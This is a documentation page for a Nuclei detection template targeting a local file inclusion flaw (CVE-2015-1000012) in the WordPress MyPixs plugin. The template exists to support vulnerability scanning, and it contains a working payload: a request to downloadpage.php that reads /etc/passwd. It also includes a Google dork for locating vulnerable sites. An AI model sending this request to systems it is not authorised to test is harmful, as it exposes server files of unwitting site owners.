WordPress MyPixs <=0.3 - Local File Inclusion
ID: CVE-2015-1000012
Severity: high
Author: daffainfo
Tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project
Description
Section titled “Description”WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2015-1000012
info: name: WordPress MyPixs <=0.3 - Local File Inclusion author: daffainfo severity: high description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. impact: | An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the server. remediation: | Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - http://www.vapidlabs.com/advisory.php?v=154 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.00689 epss-percentile: 0.79673 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: mypixs_project product: mypixs framework: wordpress google-query: inurl:"/wp-content/plugins/mypixs" tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project
http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100d66667b276a9e698a72ed3ce9d6e7a05fd6dee9247802dbbec680d42090fb24f022100e54da5ad31b7a50f8c5f5ecdc9cdbf3f340185bdd87608949f04dd2ac3c76b7a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-1000012.yaml"